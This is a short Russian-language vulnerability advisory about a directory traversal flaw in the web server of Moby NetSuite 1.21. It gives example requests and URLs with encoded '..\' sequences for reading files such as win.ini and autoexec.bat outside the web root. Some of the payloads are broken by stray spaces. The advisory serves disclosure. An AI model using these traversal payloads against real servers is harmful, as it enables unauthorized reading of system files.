Уязвимость обнаружена в Moby NetSuite в компоненте Web сервера.
Удаленный пользователь может просматривать файлы на системе, которые
расположены вне Web директории. Удаленный пользователь может представить специально обработанный URL,
содержащий символы обхода каталога, чтобы просматривать произвольные файлы
на системе. Пример: 

GET / HTTP/1.1 
Host: /error/%5c%2e%2e%5c%2e%2e %5c%2e%2e%5c%2e%2e%5cautoexec.bat 

http://127.0.0.1/%5c..%5c..%5c..%5 cwindows%5cwin.ini 
http://127.0.0.1/%5c..%5c..%5c..%5 cwindows%5cwin%2eini 
http://1 27.0.0.1/\..\..\..\windows\win.ini 

Уязвимость обнаружена в Moby NetSuite 1.21.



Оставить мнение